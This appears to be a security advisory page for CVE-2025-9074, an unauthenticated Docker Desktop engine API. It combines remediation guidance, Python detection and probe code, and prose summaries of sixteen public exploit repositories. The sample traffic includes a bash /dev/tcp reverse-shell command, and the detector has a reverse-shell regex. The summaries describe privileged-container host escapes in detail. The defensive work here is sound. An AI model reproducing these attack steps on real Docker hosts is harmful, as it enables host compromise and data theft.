Mallory
Severity: Critical | Public exploit available

Unauthenticated Docker Engine API Exposure in Docker Desktop

Identifiers: CVE-2025-9074, CWE-284

CVE-2025-9074 is a critical access control vulnerability in Docker Desktop on Windows and macOS, affecting versions prior to 4.44.3. Docker Desktop exposes the Docker Engine API over a TCP socket on the Docker subnet, at 192.168.65.7:2375 by default, without authentication. As a result, a process running inside a local Linux container can directly access the engine API even when Enhanced Container Isolation (ECI) is enabled and even when the user-facing option to expose the daemon on tcp://localhost:2375 without TLS is disabled. By issuing privileged Docker API requests, an attacker in a container can control other containers, create new containers, manage images, and in some environments escalate beyond intended container isolation. On Docker Desktop for Windows using the WSL backend, this can additionally permit mounting the host drive with the privileges of the user running Docker Desktop.


ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation breaks the intended isolation boundary between a local Linux container and the Docker Desktop host environment. An attacker who gains code execution in any local container can use the unauthenticated engine API to administer the local Docker environment, interfere with or take over sibling containers, create attacker-controlled containers, pull or modify images, and potentially access or overwrite sensitive files via host mounts. In Windows/WSL-backed deployments, this may enable effective host compromise in the security context of the user running Docker Desktop, including arbitrary code execution through modification of host-accessible files or abuse of mounted host storage.

Mitigation

If you can’t patch tonight, do this now.

Until patching is completed, reduce exposure by preventing untrusted or low-trust workloads from running in local Docker Desktop containers, especially on developer endpoints. Restrict who can start containers, avoid running containers from untrusted images, and monitor for unexpected connections from containers to 192.168.65.7:2375 or equivalent Docker subnet endpoints. On Windows systems using the WSL backend, treat container compromise as potentially leading to host-level impact and limit sensitive host file access accordingly. These are compensating controls only; the primary mitigation is upgrading to a fixed Docker Desktop release.
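Watching for these connections is easier when you know what the requests look like. As an added example for this page (not code from the page or from any of the repositories listed below), the Python below classifies Docker Engine API requests seen at 192.168.65.7:2375, for instance from a proxy or packet capture that yields source address, method, path and JSON body, and flags the request shapes the public proofs of concept rely on: privileged container creation, host-path bind mounts, host network mode, exec creation and reverse-shell commands. The `ApiRequest` record, the sample traffic and the container address 192.168.65.3 are constructed for the example; the API paths and `HostConfig` fields are the standard engine API.

```python
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Engine API endpoint that Docker Desktop exposes on its subnet (from the advisory)
# and that the public PoCs hardcode or default to.
ENGINE_API_ENDPOINT = "192.168.65.7:2375"

# Host-path prefixes the PoCs bind-mount to reach the host drive. "/" covers the
# Linux/macOS style "/:/mnt/host" binds; the rest are Docker Desktop/WSL host mounts.
# Windows drive-letter binds ("C:\\...") are not modelled here.
HOST_PATH_PREFIXES = ("/run/desktop/mnt/host/", "/host_mnt/", "/mnt/host/")

# Engine API paths may carry a version prefix such as /v1.43/containers/create.
_CREATE_RE = re.compile(r"^/(?:v[\d.]+/)?containers/create(?:\?|$)")
_EXEC_RE = re.compile(r"^/(?:v[\d.]+/)?containers/[^/]+/exec(?:\?|$)")
_PULL_RE = re.compile(r"^/(?:v[\d.]+/)?images/create(?:\?|$)")
_REVSHELL_RE = re.compile(r"/dev/tcp/|mkfifo|\bnc\b[^\n]*\s-e\s")


@dataclass
class ApiRequest:
    """One HTTP request seen at the engine API (field names are this example's own)."""
    src_ip: str
    dst: str          # "host:port" the request was sent to
    method: str
    path: str         # request path, query string included
    body: bytes = b""


@dataclass
class Finding:
    severity: str
    reason: str
    request: ApiRequest


def _bind_targets_host(bind: str) -> bool:
    """True if a HostConfig.Binds entry mounts a host path into the container."""
    host_path = bind.split(":", 1)[0]
    return host_path == "/" or host_path.startswith(HOST_PATH_PREFIXES)


def _json_body(req: ApiRequest) -> dict:
    try:
        parsed = json.loads(req.body) if req.body else {}
    except ValueError:
        return {}
    return parsed if isinstance(parsed, dict) else {}


def classify(req: ApiRequest, container_ips: set[str]) -> list[Finding]:
    """Return findings for one request; empty if it is not aimed at the engine API."""
    if req.dst != ENGINE_API_ENDPOINT:
        return []
    findings: list[Finding] = []
    if req.src_ip in container_ips:
        # On an unpatched Desktop any container can reach this socket; the advisory's
        # compensating control is to watch for exactly these connections.
        findings.append(Finding("medium", "container reached unauthenticated engine API", req))
    if req.method != "POST":
        return findings
    body = _json_body(req)
    if _CREATE_RE.match(req.path):
        host_config = body.get("HostConfig") or {}
        if host_config.get("Privileged") is True:
            findings.append(Finding("critical", "privileged container creation", req))
        host_binds = [b for b in host_config.get("Binds") or [] if _bind_targets_host(b)]
        if host_binds:
            findings.append(Finding("critical", f"host filesystem bind mount: {host_binds}", req))
        if host_config.get("NetworkMode") == "host":
            findings.append(Finding("high", "host network mode", req))
        if _REVSHELL_RE.search(" ".join(body.get("Cmd") or [])):
            findings.append(Finding("critical", "reverse shell command", req))
    elif _EXEC_RE.match(req.path):
        findings.append(Finding("high", "exec instance created", req))
    elif _PULL_RE.match(req.path):
        findings.append(Finding("medium", "image pull via API", req))
    return findings


def scan(requests: list[ApiRequest], container_ips: set[str]) -> list[Finding]:
    return [f for req in requests for f in classify(req, container_ips)]


# Constructed sample traffic: one container (192.168.65.3, a made-up address on the
# Docker Desktop subnet) replaying the request shapes the PoCs on this page use.
SAMPLE_REQUESTS = [
    ApiRequest("192.168.65.3", ENGINE_API_ENDPOINT, "GET", "/version"),
    ApiRequest("192.168.65.3", ENGINE_API_ENDPOINT, "POST", "/containers/create?name=alpine_escape",
               json.dumps({"Image": "alpine:latest", "Cmd": ["sh"],
                           "HostConfig": {"Privileged": True,
                                          "Binds": ["/run/desktop/mnt/host/c/:/mnt"]}}).encode()),
    ApiRequest("192.168.65.3", ENGINE_API_ENDPOINT, "POST", "/containers/abc123/exec",
               json.dumps({"Cmd": ["sh", "-c", "id"], "AttachStdout": True}).encode()),
    ApiRequest("192.168.65.3", ENGINE_API_ENDPOINT, "POST", "/containers/create",
               json.dumps({"Image": "alpine:latest",
                           "Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"],
                           "HostConfig": {"NetworkMode": "host"}}).encode()),
    ApiRequest("10.0.0.9", "10.0.0.10:443", "GET", "/healthz"),  # unrelated traffic, ignored
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS, {"192.168.65.3"}):
        print(f"[{f.severity}] {f.reason}  <- {f.request.method} {f.request.path}")
```

The set of container addresses is an input because the same socket is used by Docker Desktop's own host-side components; only sources on the container side of the subnet are evidence of the condition this advisory describes. A privileged create or a host bind mount is flagged regardless of source, since neither has a legitimate reason to arrive over this endpoint from a container.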

Remediation

Patch, then assume compromise.

Upgrade Docker Desktop to version 4.44.3 or later on affected Windows and macOS systems. The vendor advisory indicates users of vulnerable releases should update promptly because the issue is not prevented by Enhanced Container Isolation and is independent of the localhost:2375 exposure setting. Apply the vendor-provided fixed release across developer workstations and any managed endpoints running Docker Desktop.
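A quick way to confirm both the release and the exposure is to ask the engine API itself from inside a container: on a vulnerable Desktop, GET http://192.168.65.7:2375/version answers without credentials, and the response carries the Docker Desktop release in Platform.Name. The Python below is an added example for this page, not vendor code; it assumes that Platform.Name has the form "Docker Desktop 4.44.2 (build)" (the same string `docker version` prints for the server) and the sample payloads used to check it are constructed. Run it from inside a container on the workstation being checked; `assess` also covers the case where the API answers although the release is already fixed, which would point at a different exposure path than this CVE.

```python
from __future__ import annotations

import json
import re
import urllib.error
import urllib.request

# Endpoint and fixed release named in the advisory.
ENGINE_API_URL = "http://192.168.65.7:2375"
FIXED_DESKTOP_VERSION = (4, 44, 3)

# Docker Desktop reports its own release in the engine's /version response under
# Platform.Name, e.g. "Docker Desktop 4.44.2 (202017)". Assumption for this example:
# that format holds; the regex is loose so a different build suffix still parses.
_DESKTOP_RE = re.compile(r"Docker Desktop (\d+)\.(\d+)\.(\d+)")


def desktop_version(version_payload: dict) -> tuple[int, int, int] | None:
    """Docker Desktop release from a /version payload, or None if not Desktop."""
    name = (version_payload.get("Platform") or {}).get("Name", "")
    match = _DESKTOP_RE.search(name)
    return tuple(int(part) for part in match.groups()) if match else None


def is_vulnerable(desktop: tuple[int, int, int] | None) -> bool | None:
    """True if older than 4.44.3, False if fixed, None if not Docker Desktop at all."""
    if desktop is None:
        return None
    return desktop < FIXED_DESKTOP_VERSION


def probe(base_url: str = ENGINE_API_URL, timeout: float = 3.0) -> dict | None:
    """GET /version on the engine API. Run from inside a container on the Desktop host;
    returns None when nothing answers, which is the expected result on a fixed release."""
    try:
        with urllib.request.urlopen(f"{base_url}/version", timeout=timeout) as resp:
            return json.load(resp)
    except (urllib.error.URLError, OSError, ValueError):
        return None


def assess(payload: dict | None) -> str:
    """One-line verdict for a /version payload (None means the probe got no answer)."""
    if payload is None:
        return "not reachable: engine API did not answer from this container"
    release = desktop_version(payload)
    engine = payload.get("Version", "unknown")
    status = is_vulnerable(release)
    if status is None:
        return (f"reachable: unauthenticated daemon (engine {engine}), not Docker Desktop; "
                "this is a plain exposed-daemon misconfiguration, not CVE-2025-9074")
    label = ".".join(map(str, release))
    if status:
        return (f"EXPOSED: Docker Desktop {label} (engine {engine}) answers without "
                "authentication and is older than 4.44.3")
    return (f"reachable on Docker Desktop {label} (engine {engine}) despite the fix; "
            "check how this container reaches the engine subnet")


if __name__ == "__main__":
    print(assess(probe()))
```

On a fixed release the probe should time out or be refused from inside a container; a response of any kind is the finding, and the release string tells you whether it is this CVE or some other route to the daemon.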
PUBLIC EXPLOITS

Exploits

16 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (5 hidden).

Valid: 16 / 21 total
CVE-2025-9074 (maturity: PoC; verified exploit)

Repository is a small standalone PHP proof-of-concept exploit with 4 files: one executable exploit script (`poc.php`), a README, license, and editor settings. The exploit is not part of a larger framework. The main capability is unauthenticated remote code execution against an exposed Docker Engine API by abusing container management endpoints over HTTP. The script creates a privileged `alpine:latest` container, bind-mounts the host filesystem (`/:/mnt/hostfs` for Linux/macOS or `/mnt/host/c:/mnt/hostfs` for Windows), starts the container, and either executes an attacker-supplied command or launches a reverse shell. In command mode, it polls `/containers/{id}/json` until the container exits, then fetches `/containers/{id}/logs?stdout=1&stderr=1` and demultiplexes Docker’s multiplexed log stream to display output. In reverse-shell mode, it uses a shell one-liner with bash `/dev/tcp`, netcat+FIFO, or a fallback file-descriptor loop, and sets `NetworkMode` to `host`. Optional cleanup stops and deletes the container. The README provides usage examples, target assumptions, and mitigation guidance. Overall, this is an operational exploit POC for exposed unauthenticated Docker APIs, enabling host filesystem access, arbitrary command execution, and reverse-shell compromise.

c0gnit00, disclosed May 30, 2026. Tags: php, markdown, network, container.

CVE-2025-9074-Docker-Desktop-API-Escape-PoC (maturity: PoC; verified exploit)

This repository is a small Bash-based operational PoC centered on a single script, docker_shell.sh, supported by README and policy/license files. The script is not a framework module; it is a standalone interactive wrapper around the Docker Engine REST API. Its purpose is to provide an emulated shell into a Docker container without using the Docker CLI, Python, or jq. Core capability: the script talks directly to an exposed Docker API endpoint at http://192.168.65.7:2375, looks up or creates a container named alpine_escape, bind-mounts the host path /run/desktop/mnt/host/c/ into the container at /mnt, starts the container, and then lets the operator run arbitrary commands via Docker exec. This effectively exposes the host Windows C: drive inside the container and allows command execution against that mounted data. The script also implements its own parser for Docker's multiplexed exec output stream using dd, od, and awk, storing raw output in /tmp/docker_out.bin before decoding it. Repository structure: 5 files total, with one code file (docker_shell.sh) and four documentation/legal files (README.md, ETHICAL_USE.md, NOTICE.md, LICENSE). README.md explains the intended Docker Desktop/WSL2 environment, usage flow, and mount layout. The code file contains all exploit logic: get_container_id() enumerates containers by name; start_container() creates an Alpine container with a host bind mount and starts it; run_cmd() creates and starts exec instances for arbitrary shell commands; status() queries container state. From an exploitation perspective, this is an operational abuse script for an exposed Docker Engine API in Docker Desktop/WSL2-style environments. It is not merely a detector and does not rely on a benign proof-only action; it performs container creation, host-drive mounting, and arbitrary command execution. 
The claimed CVE is CVE-2025-9074 in the notice, but the code itself is best characterized as a practical Docker API abuse/escape-style PoC targeting misconfigured or exposed Docker Desktop/Engine access rather than containing a memory-corruption exploit.

Medaz-Sploit, disclosed May 15, 2026. Tags: bash, markdown, network, container, local.

CVE-2025-9074-docker-escape (maturity: PoC; verified exploit)

This repository is a small, self-contained Bash exploit consisting of a README and one executable script, escape.sh. The script targets an exposed, unauthenticated Docker Remote API on TCP/2375 and abuses it to create a privileged Alpine container with the host root filesystem bind-mounted to /mnt/host. After starting the container, it provides an interactive loop that uses Docker exec API calls to run arbitrary shell commands inside that container. Because the container is privileged and has the host filesystem mounted, the exploit effectively grants host-level access and enables container escape in practice. Repository structure is minimal: README.md explains the attack scenario and intended HTB/lab usage, while escape.sh contains the full exploit logic. The script performs the following sequence: POST /containers/create with Privileged=true and Binds ["/:/mnt/host"], POST /containers/<id>/start, then repeatedly POST /containers/<id>/exec and /exec/<id>/start to execute attacker-supplied commands. It also supports a basic local cd handler to maintain a working directory across commands and cleans up by stopping and deleting the container on exit. The exploit is operational rather than a mere proof of concept because it automates end-to-end exploitation and provides an interactive command interface, but it is not highly weaponized: the target endpoint is hardcoded, the image is fixed to alpine, and there is no broader framework integration or payload customization layer.

chernandez321, disclosed Apr 7, 2026. Tags: markdown, bash, network, container.

cve-2025-9074-poc (maturity: PoC; verified exploit)

This repository is a small standalone Go proof-of-concept for CVE-2025-9074 consisting of two files: a Japanese README and a single executable source file, poc.go. It is not part of a larger exploit framework. The README explains the intended scenario: abuse of an unauthenticated Docker Engine remote API to create a privileged container with host bind mounts, primarily demonstrated against a Windows + Docker Desktop style environment. The main exploit logic is in poc.go. The program hardcodes the Docker API target as http://192.168.65.7:2375 and first checks reachability via /version. It then enumerates available images through /images/json, preferring common lightweight images such as alpine, busybox, ubuntu, debian, centos, nginx, and httpd. If no suitable image is found, it attempts to pull alpine:latest using the Docker API /images/create endpoint. After obtaining an image, the PoC creates a privileged container and bind-mounts host filesystem paths into it, using Windows/Docker Desktop-oriented host path candidates such as /run/desktop/mnt/host/<drive> and /host_mnt/<drive>. The stated goal is to write a marker file onto the host filesystem from inside the container, thereby demonstrating host read/write impact. The code also queries /info to print selected daemon and security-related information, then removes the created container. Operationally, this is more than a detector: it performs the full API abuse chain needed to demonstrate impact, although the payload is basic and hardcoded rather than modular, so it is best characterized as an operational PoC rather than a weaponized tool. The attack vector is network-based access to an exposed Docker daemon, with the resulting capability being host filesystem access via privileged container creation and bind mounts. The most important fingerprintable target is the hardcoded Docker API endpoint 192.168.65.7:2375, along with the Docker API paths /version, /images/json, /images/create, /info, and the documented container lifecycle endpoints. The repository's purpose is educational demonstration of the risk posed by exposing the Docker Engine API without authentication.

XRayZen, disclosed Aug 23, 2025. Tags: go, markdown, network, container escape / host filesystem access.

CVE-2025-9074 (maturity: PoC; verified exploit)

This repository is a small standalone Bash exploit consisting of one executable script and a README. The main file, CVE-2025-9074.sh, is a dependency-free exploit that manually speaks HTTP over Bash's /dev/tcp interface to a hardcoded Docker API endpoint at 192.168.65.7:2375. Its purpose is to abuse an exposed Docker Engine API to obtain command execution by creating an Alpine container, bind-mounting the host Windows C: drive from /run/desktop/mnt/host/c/ into /mnt inside the container, starting the container, creating an exec instance, and running an arbitrary user-provided command. Output is read back from the API response and printed to the console, after which the script force-removes the container for cleanup. Repository structure is minimal: README.md briefly explains the concept and usage, while the Bash script contains all exploit logic. Internally, the script builds a JSON command array from CLI arguments, uses a helper to extract object IDs from JSON responses, and implements a send_request function that crafts raw HTTP requests and reads responses directly from the socket. The exploit is operational rather than a mere proof of concept because it performs the full attack chain end-to-end and supports arbitrary command input, but it is not highly weaponized since targeting and payload handling are hardcoded. The primary capability is remote command execution in a container with access to host-mounted files, which can enable browsing, reading, or modifying data on the host C: drive depending on Docker and host permissions.

rocket-panda, disclosed Mar 23, 2026. Tags: bash, markdown, network.

CVE-2025-9074 (maturity: PoC; verified exploit)

Repository contains a single shell script (CVE-2025-9074.sh) implementing an operational network exploit against an exposed, unauthenticated Docker Engine Remote API (HTTP). The script takes four parameters: target IP, target API port, attacker callback IP (LHOST), and callback port (LPORT). It first queries the Docker API endpoint /images/json to obtain an existing image tag (first RepoTags entry), then crafts a JSON request to /containers/create that sets Cmd to run /bin/bash -c with a bash reverse shell using /dev/tcp to connect back to the attacker. The container is created with HostConfig.Binds that mount host paths into the container ("/mnt/host/c:" to /host_root_win and "/" to /host_root_nix), enabling access to host filesystems from inside the container. Finally, it POSTs to /containers/{id}/start to execute the payload. Overall purpose: achieve code execution via Docker API and facilitate host compromise/LPE by leveraging privileged host filesystem mounts once the container is running.

matesz44, disclosed Feb 9, 2026. Tags: bash, sh, network.

POC-for-CVE-2025-9074 (maturity: PoC; verified exploit)

This repository contains a single proof-of-concept Bash script (POC-for-CVE-2025-9074.sh) and a license file. The script targets Docker Engine instances with the HTTP API exposed (default port 2375), specifically on Windows hosts. It allows an attacker to read from or write to arbitrary files on the Windows host by abusing Docker's bind mount feature. The script works by converting a Windows file path to a Linux-style path, creating a container with a bind mount to the host directory, and executing a shell command inside the container to perform the file operation. The result is retrieved via the Docker API. The exploit demonstrates the risk of exposing the Docker API without authentication, especially on Windows systems, and provides a clear example of how an attacker could leverage this misconfiguration for arbitrary file access. No detection or fake code is present; this is a functional POC exploit.

x0da6h, disclosed Jan 4, 2026. Tags: bash, network.

CVE-2025-9074_DAEMON_KILLER (maturity: PoC; verified exploit)

This repository contains a Bash exploit script (Fsociety-CVE-2025-9074_v.4.4.sh) targeting CVE-2025-9074, a critical Docker Desktop container escape vulnerability. The script is interactive and user-friendly, prompting the attacker for the target Docker host IP and port (defaulting to 192.168.65.7:2375), and verifying connectivity to the Docker API. It offers two main attack modes: a classic reverse shell and an interactive shell, both leveraging Docker API access to escape the container and gain host-level access, potentially with root privileges. The script also includes features for log deletion to cover tracks. The README provides detailed usage instructions, system requirements, and background on the vulnerability. The codebase is simple, with one main Bash script, a README, and a license file. The exploit is operational, providing real attack functionality rather than just detection or proof-of-concept.

KvzinNcpx7, disclosed Jun 19, 2024. Tags: bash, network.

CVE-2025-9074-Docker-Exploit (maturity: PoC; verified exploit)

This repository contains a Python exploit tool for CVE-2025-9074, the Docker Desktop vulnerability that exposes the Docker Remote API without authentication, allowing an attacker with access to the endpoint to execute arbitrary commands, create containers with host disk mounts (enabling container escape), and perform file operations on the Docker host. The main script, 'CVE-2025-9074-docker-exploit.py', provides a menu-driven interface for container and image management, command execution (including interactive shells), and host file manipulation via the Docker API. The exploit is operational and automates the attack process, including Windows path normalization for Docker Desktop environments. The default target is 'http://192.168.65.7:2375', but a custom endpoint can be specified. The repository also includes a README with detailed usage instructions and a requirements.txt for dependencies. The attack vector is network-based, requiring access to an exposed Docker API endpoint. No fake or detection-only code is present; this is a functional exploit.

Shaoshi17, disclosed Dec 26, 2025. Tags: python, network.

CVE-2025-9074-Poc (maturity: PoC; verified exploit)

This repository contains a Bash-based proof-of-concept exploit for CVE-2025-9074, a critical vulnerability in Docker Desktop that allows unauthenticated remote code execution via the Docker Engine API (typically exposed on 192.168.65.7:2375). The exploit script (exploit.sh) automates the process of discovering available Docker images, creating a privileged container with the host filesystem mounted, and executing a reverse shell payload to the attacker's specified listener. The exploit requires the attacker to provide a listener IP and port, and it leverages the unauthenticated Docker API to achieve host root access. The repository is minimal, containing only the exploit script and a markdown readme with usage instructions and vulnerability details. No external dependencies are required beyond standard Bash utilities. The attack vector is network-based, targeting exposed Docker APIs, and the endpoints used are the Docker API's image listing, container creation, and container start endpoints.

zaydbf, disclosed Dec 22, 2025. Tags: bash, markdown, network.

CVE-2025-9074-POC (maturity: PoC; verified exploit)

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-9074, targeting Docker Engine instances with the API exposed over TCP (default port 2375) without authentication. The main exploit script, 'cve-2025-9074.sh', is a Bash script that takes a target IP, port, attacker IP, and listener port as arguments. It first checks if the Docker API is accessible, then crafts a JSON payload to create a privileged Docker container using the 'alpine:latest' image. The container runs a shell command that establishes a reverse shell to the attacker's machine using netcat. The script then starts the container, triggering the reverse shell. The repository structure is simple, containing a license, a README with usage instructions, and the exploit script. The exploit demonstrates the risk of exposing the Docker API without authentication and provides a working reverse shell payload for demonstration and testing purposes.

3rendil, disclosed Dec 10, 2025. Tags: bash, network.

CVE-2025-9074-PoC-Bash (maturity: PoC; verified exploit)

This repository provides a Bash proof-of-concept exploit for CVE-2025-9074, targeting Docker daemons with their API exposed over TCP (commonly port 2375) without authentication, particularly in environments where the host is a Windows machine. The repository contains two files: a README.md with usage instructions and context, and cve-2025-9074-poc.sh, the main exploit script. The script takes an IP, port, and command as arguments, then uses the Docker API to create a new container with the host's Windows C: drive mounted to /host_root, executes the specified command, retrieves the output, and cleans up the container. The exploit demonstrates how an attacker can leverage an exposed Docker API to gain access to sensitive files or execute arbitrary commands on the host system. The attack vector is network-based, requiring access to the Docker API endpoint. The endpoints used are all HTTP requests to the Docker API for container creation, management, and log retrieval. The exploit is operational and demonstrates real-world impact if the Docker API is left exposed and unprotected.

pppxo, disclosed Dec 10, 2025. Tags: bash, network.

CVE-2025-9074-Docker-Desktop-Container-Escape (maturity: PoC; verified exploit)

This repository contains a working exploit for CVE-2025-9074, a critical container escape vulnerability in Docker Desktop (versions < 4.44.3) on Windows and macOS. The exploit leverages unauthenticated access to the Docker Engine API at http://192.168.65.7:2375, which is exposed to containers in vulnerable configurations. The main exploit script (exploit.py) is written in Python and provides three modes: arbitrary command execution, interactive root shell, and reverse shell. It does so by creating a privileged container with the host filesystem mounted at /hostfs, then executing the desired payload. The exploit is operational and provides full host compromise from a container context. The repository is well-documented, with a detailed README explaining the vulnerability, usage instructions, and mitigation steps. No detection-only scripts are present; the code is a functional exploit. The only code file is exploit.py, which is the entry point and contains all exploit logic.

PtechAmanja, disclosed Dec 9, 2025. Tags: python, network.

CVE-2025-9074-PoC (maturity: PoC; verified exploit)

This repository contains a Bash proof-of-concept exploit for CVE-2025-9074, the critical Docker Desktop vulnerability in which the Docker Engine API is exposed without authentication (commonly on port 2375); the script is written generically enough to work against any Docker daemon exposed that way. The main file, 'cve-2025-9074.sh', is a standalone script that automates the exploitation process. It first checks connectivity to the Docker API, detects the target OS (Linux or Windows), and determines the appropriate mount path for host breakout. The script enumerates available Docker images on the target, creates a new container with the host's root (or C:) mounted, and executes an arbitrary command provided by the user. After execution, it cleans up by deleting the container. The exploit requires no dependencies beyond standard Bash utilities and curl, and is designed to work even on air-gapped systems by using existing images. The README provides usage instructions and describes the exploit's features. The primary attack vector is network-based, targeting exposed Docker APIs, and the exploit enables arbitrary command execution inside a container that has the host filesystem mounted, which is effectively host-level access.

BridgerAlderson, disclosed Dec 6, 2025. Tags: bash, markdown, network.

CVE-2025-9074 (maturity: PoC; verified exploit)

This repository is a proof-of-concept (PoC) exploit for CVE-2025-9074, a misconfiguration vulnerability in Docker where the Remote API is exposed without authentication. The repository contains two files: a README.md with background, usage, and context, and exploit.py, a Python script that interacts with the Docker Remote API. The script allows an attacker to create and start a new container on the target Docker host, execute an arbitrary command (as specified by the user), retrieve the output from the container logs, and optionally clean up (stop and remove) the container. The exploit requires the Docker daemon to be listening on a network-accessible interface (e.g., 0.0.0.0:2375) without TLS or authentication, which is a dangerous misconfiguration. The code is intended for educational and lab use only, as emphasized in the README. The main attack vector is network-based, targeting the Docker API over HTTP. The endpoints used are standard Docker API paths for container management. The exploit is a functional PoC and does not include advanced payloads or automation beyond the described functionality.

j3r1ch0123, disclosed Sep 3, 2025. Tags: python, network.

CVE-2025-9074 (maturity: PoC; verified exploit)

This repository provides a proof-of-concept exploit for CVE-2025-9074, the Docker Desktop vulnerability (affecting Windows and macOS; this PoC targets the Windows case) in which the Docker Engine API is exposed to containers at http://192.168.65.7:2375. The exploit consists of a Python script (cve_2025_9074_poc.py) that, when run from inside a container on a vulnerable host, connects to the Docker Engine API, creates a new container with a bind mount to the Windows C:\ drive, and writes a file (C:\pwn.txt) to the host. The script is configurable via command-line arguments for the target host, port, image, bind paths, and output filename. The repository also includes a Sigma detection rule (sigma.yml) for identifying suspicious access to the Docker Engine API, and a detailed README.md explaining the vulnerability, usage, mitigation, and detection strategies. The main attack vector is network access to the Docker Engine API from within a container, and the exploit demonstrates container-to-host file write via misconfigured Docker API exposure.

zenzue, disclosed Aug 25, 2025. Tags: python, yaml, network.
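Several of the entries above (c0gnit00's poc.php, Medaz-Sploit's docker_shell.sh, pppxo's log retrieval) have to parse the output stream the engine returns from /containers/{id}/logs and /exec/{id}/start, and the same parsing is needed by anyone building tooling that records what an attacker ran over this endpoint. The stream format is documented in the Docker Engine API: each frame is an 8-byte header (stream type in byte 0, three zero bytes, a big-endian uint32 payload length in bytes 4 to 7) followed by the payload. The demultiplexer below is an added example written for this page, not code from any of the listed repositories; the sample stream is constructed inline.

```python
from __future__ import annotations

import struct

# Frame header per the Docker Engine API "stream format": byte 0 is the stream type
# (0 stdin, 1 stdout, 2 stderr), bytes 1-3 are zero, bytes 4-7 are the big-endian
# uint32 payload length. The payload of that length follows immediately.
HEADER = struct.Struct(">BxxxI")
STREAM_NAMES = {0: "stdin", 1: "stdout", 2: "stderr"}


def demux(stream: bytes) -> dict[str, bytes]:
    """Split a multiplexed attach/logs stream into per-descriptor byte strings.

    Raises ValueError on a truncated frame or an unknown stream type rather than
    silently returning partial output, so a cut connection is visible to the caller.
    """
    out = {"stdin": b"", "stdout": b"", "stderr": b""}
    offset = 0
    while offset < len(stream):
        if len(stream) - offset < HEADER.size:
            raise ValueError(f"truncated header at offset {offset}")
        kind, size = HEADER.unpack_from(stream, offset)
        name = STREAM_NAMES.get(kind)
        if name is None:
            raise ValueError(f"unknown stream type {kind} at offset {offset}")
        start = offset + HEADER.size
        payload = stream[start:start + size]
        if len(payload) != size:
            raise ValueError(f"truncated payload at offset {start}: want {size}, have {len(payload)}")
        out[name] += payload
        offset = start + size
    return out


def decode(stream: bytes, tty: bool) -> dict[str, bytes]:
    """Containers and exec instances created with Tty=true return a raw byte stream
    with no frame headers; only non-TTY output is multiplexed."""
    if tty:
        return {"stdin": b"", "stdout": stream, "stderr": b""}
    return demux(stream)


def frame(kind: int, payload: bytes) -> bytes:
    """Build one frame; used here only to construct the sample stream."""
    return HEADER.pack(kind, len(payload)) + payload


# Constructed sample: what a non-TTY exec of `sh -c 'id; ls /nonexistent; echo done'`
# would return (the engine emits one frame per write, so three frames here).
SAMPLE_STREAM = (
    frame(1, b"uid=0(root) gid=0(root)\n")
    + frame(2, b"ls: /nonexistent: No such file or directory\n")
    + frame(1, b"done\n")
)

if __name__ == "__main__":
    for name, data in decode(SAMPLE_STREAM, tty=False).items():
        if data:
            print(f"{name}: {data!r}")
```

The TTY distinction matters in practice: several of the PoCs create their exec instance with a TTY for an interactive shell, in which case the bytes come back raw and a header parser will mis-read the first eight bytes of output as a frame.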